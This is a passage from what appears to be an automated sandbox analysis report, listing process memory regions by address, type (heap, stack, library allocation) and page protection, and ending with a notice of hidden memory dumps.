page read and write
|
||
24E98160000
|
heap
|
page read and write
|
||
1DA63030000
|
heap
|
page read and write
|
||
7FF848BF6000
|
trusted library allocation
|
page execute and read and write
|
||
20025C60000
|
heap
|
page readonly
|
||
1D99EFBC000
|
heap
|
page read and write
|
||
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
207DCFF9000
|
heap
|
page read and write
|
||
207D0CCB000
|
heap
|
page read and write
|
||
F7EB2FF000
|
stack
|
page read and write
|
||
7FF6373FA000
|
unkown
|
page readonly
|
||
14635723000
|
trusted library allocation
|
page read and write
|
||
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
1B780000
|
heap
|
page read and write
|
||
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
920000
|
trusted library allocation
|
page read and write
|
||
201ADEC7000
|
trusted library allocation
|
page read and write
|
||
1C3E0000
|
heap
|
page read and write
|
||
1D99EFCE000
|
heap
|
page read and write
|
||
247BF4E0000
|
trusted library allocation
|
page read and write
|
||
207DC380000
|
trusted library allocation
|
page read and write
|
||
7FF49B400000
|
trusted library allocation
|
page execute and read and write
|
||
12E79000
|
trusted library allocation
|
page read and write
|
||
1D99E877000
|
heap
|
page read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
7FF848E49000
|
trusted library allocation
|
page read and write
|
||
146302A0000
|
heap
|
page read and write
|
||
1D99E7FE000
|
heap
|
page read and write
|
||
207D3177000
|
heap
|
page read and write
|
||
7FF848BF6000
|
trusted library allocation
|
page execute and read and write
|
||
1D99F002000
|
heap
|
page read and write
|
||
2BF9D110000
|
heap
|
page read and write
|
||
535E000
|
trusted library allocation
|
page read and write
|
||
7FF848C06000
|
trusted library allocation
|
page execute and read and write
|
||
1D466B1F000
|
trusted library allocation
|
page read and write
|
||
1D99EEA8000
|
heap
|
page read and write
|
||
247BD941000
|
heap
|
page read and write
|
||
C4BF2FD000
|
stack
|
page read and write
|
||
207E021A000
|
heap
|
page read and write
|
||
1D465941000
|
trusted library allocation
|
page read and write
|
||
F7ED5FA000
|
stack
|
page read and write
|
||
4F2B000
|
trusted library allocation
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page read and write
|
||
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
7FF848F2C000
|
trusted library allocation
|
page read and write
|
||
207DD42F000
|
heap
|
page read and write
|
||
1C9E8000
|
stack
|
page read and write
|
||
14635A50000
|
remote allocation
|
page read and write
|
||
2BF9CE93000
|
heap
|
page read and write
|
||
1D99EA58000
|
heap
|
page read and write
|
||
536C000
|
trusted library allocation
|
page read and write
|
||
2003E724000
|
heap
|
page read and write
|
||
1D99EA58000
|
heap
|
page read and write
|
||
207DE62E000
|
heap
|
page read and write
|
||
1BA6E000
|
stack
|
page read and write
|
||
207DDC20000
|
heap
|
page read and write
|
||
7FF848B03000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848B42000
|
trusted library allocation
|
page read and write
|
||
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
201ACD28000
|
trusted library allocation
|
page read and write
|
||
2EF977E000
|
unkown
|
page readonly
|
||
207DCF4B000
|
heap
|
page read and write
|
||
201BCDFA000
|
trusted library allocation
|
page read and write
|
||
9CA897E000
|
stack
|
page read and write
|
||
207DD8F0000
|
trusted library allocation
|
page read and write
|
||
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
207D0D0A000
|
heap
|
page read and write
|
||
8F1000
|
stack
|
page read and write
|
||
247D7DA1000
|
heap
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
1E9E221A000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
1D47DD36000
|
heap
|
page read and write
|
||
1D99E853000
|
heap
|
page read and write
|
||
52E4000
|
trusted library allocation
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
2BFB7379000
|
heap
|
page read and write
|
||
7FF848B13000
|
trusted library allocation
|
page execute and read and write
|
||
1D47DFF9000
|
heap
|
page read and write
|
||
2EF7C77000
|
stack
|
page read and write
|
||
2EF967E000
|
stack
|
page read and write
|
||
1B1DE000
|
stack
|
page read and write
|
||
207D5E40000
|
trusted library section
|
page readonly
|
||
1E9E6496000
|
heap
|
page read and write
|
||
7FF789E06000
|
unkown
|
page read and write
|
||
2B80000
|
heap
|
page execute and read and write
|
||
9C6EDFF000
|
stack
|
page read and write
|
||
1C9725AE000
|
heap
|
page read and write
|
There are 2992 hidden memdumps, click here to show them.